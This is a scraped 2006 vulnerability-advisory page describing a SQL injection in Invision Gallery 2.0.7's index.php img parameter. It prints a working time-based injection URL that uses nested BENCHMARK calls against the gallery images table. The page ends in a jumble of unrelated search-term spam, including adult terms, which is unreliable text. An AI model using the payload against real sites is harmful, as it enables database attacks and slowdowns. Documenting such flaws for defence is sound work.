about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability


Title Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability
Published 2006-12-01-12:00AM
Updated 2006-12-04-06:44PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  infection@mail.kz is credited with the discovery of this vulnerability.
Vulnerable  Invision Power Services Invision Gallery 2.0.7
Not Vulnerable  
Code   Attackers can exploit these issues via a web client.

The following exploit is available:

http://www.example.com/index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 29 Nov 2009 12:35:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWWFANKOUC BID 2205 news for c zhuangyuan fatsex qqyingxion 200 /compo news for c rds namhitha Hot videos news for c WWW.3PIC.C /search/ex Latest Tam sql inject 3.5.6 www.trish Crack Data My_eGaller www.xixx.c www.bddgw. sex viedo zahra amir sql sofrwa IPB Portal shellcode fullproxie WWW NAKED Angel locs Remote Inc mambo Remo jq100.com news for c Screen sav www.usaxxx news for c xxxinden w Advanced G www.tianma www.qpk8.c www.xmchua /search/ex nfs.tar.gz outlook girls suck www.xmchua WwwKeralas 200 /compo www.etaoyo